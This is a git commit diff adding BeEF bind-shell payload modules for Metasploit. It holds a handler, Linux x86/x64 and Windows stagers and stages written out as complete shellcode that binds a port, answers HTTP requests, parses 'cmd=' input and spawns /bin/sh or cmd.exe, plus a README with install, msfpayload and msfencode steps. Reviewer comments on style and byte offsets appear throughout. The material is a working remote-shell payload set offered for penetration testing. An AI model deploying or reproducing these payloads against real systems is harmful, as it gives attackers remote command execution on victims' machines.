add IPE with ActiveFax 5.01

This commit is contained in:
bmantra
2013-11-29 19:18:37 +01:00
parent 924717d6fa
commit d7116b8f08
31 changed files with 118 additions and 4 deletions


@@ -0,0 +1,73 @@
##
# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
##
module Msf
module Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeEFBind
include Msf::Handler
#
# Returns the handler specific string representation
#
def self.handler_type
return "beef_bind"
end
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
"bind"
end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444),
#OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeEFBind)
end
#
# Placeholder only
#
def cleanup_handler
end
#
# Placeholder only
#
def add_handler(opts={})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def start_handler
end
#
# Placeholder only
#
def stop_handler
end
end
end
end
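Review bot: `add_handler` ignores its `opts` parameter and its `# Start a new handler` comment is misleading, because the `start_handler` it calls a few lines below is an empty placeholder, so nothing in this module ever opens a listener; either rename the parameter `_opts` and replace the comment with `# Placeholder: start_handler is a no-op, this handler only registers LPORT`, or say in the module comment that this handler does not create sessions. The commented-out `RHOST` option inside `register_options` should be deleted or explained, and the `$Id:` line at the top is a Subversion keyword that git never expands, so it will stay stale. Style: `handler_type` uses an explicit `return "beef_bind"` while `general_handler_type` uses an implicit return; `"beef_bind"` alone matches its sibling.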


@@ -0,0 +1,85 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 165, 'n' ]
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
"\xf6\x48\x31\xd2\x0f\x05"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end
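Review bot: The `'LPORT' => [ 165, 'n' ]` offset is an undocumented magic number; it does line up with the `\x11\x5c` (4444 in network byte order) inside the `\xc7\x04\x24\x02\x00\x11\x5c` sequence on the eleventh payload line, but a maintainer who re-assembles the stage has no way to know that without recounting bytes. Add a comment such as `# byte offset of sin_port (big-endian) in the sockaddr_in the stage builds on the stack` next to the offset, and add the `# Length: N bytes` comment that the Windows stager in this commit carries above its `'Payload'`, so a changed byte count is noticed at review time. The same applies to the x86 Linux stage (`168`) and the Windows stage (`511`) in the following sections.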


@@ -0,0 +1,84 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 168, 'n' ]
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end


@@ -0,0 +1,137 @@
##
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Ty Miller' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 511, 'n' ]
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
"\xff\xd5\xe9\x58\xfe\xff\xff"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end
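Review bot: `'Version' => '$Revision: 11421 $'` is a Subversion keyword that git does not expand, so the value is frozen at whatever it was on export, and the two Linux stages in this commit carry no `'Version'` key at all; drop the key here (and the `$Revision: 9179 $` in the Windows stager) rather than keep an inconsistent, stale field. The `$Id: beef_bind-stage.rb ...$` header line has the same problem and names a file that the README in this commit installs as `beef_shell.rb`, so it misleads as well. The `'Name'` ends in `(stager)` although this module is the stage; `'BeEF Bind Windows Command Shell Stage (stage x86)'` would match the naming of the Linux stages.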


@@ -0,0 +1,49 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 54, 'n' ] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
"\x01\xc6\xff\xe6"
}
))
end
end
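Review bot: `'Name' => 'BeEF Bind HTTP Stager'` is byte-identical in this stager, the x86 Linux stager and the Windows stager that follow, whereas the stages distinguish themselves with an arch suffix; an operator listing payloads sees three modules with the same display name. Use `'BeEF Bind HTTP Stager (linux x64)'` here and the matching suffixes in the other two. The `'LPORT' => [ 54, 'n' ]` offset also lacks the `# Length: N bytes` comment that the Windows stager in this commit has above its `'Payload'`, and a short `# byte offset of sin_port (big-endian) in the sockaddr_in` comment would make the offset checkable without recounting bytes.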


@@ -0,0 +1,47 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 47, 'n' ] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}
))
end
end


@@ -0,0 +1,62 @@
##
# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}
))
end
end


@@ -0,0 +1,37 @@
Install into Metasploit on BackTrack:
cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb
cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb
cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb
cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
Check it works:
msfpayload -l | grep beef_bind
Get info on the payload:
msfpayload windows/beef_shell/beef_bind S
Dump stager and stage in C format:
msfpayload windows/beef_shell/beef_bind C
Dump stager in raw format:
msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
Encode stager to remove nulls:
msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'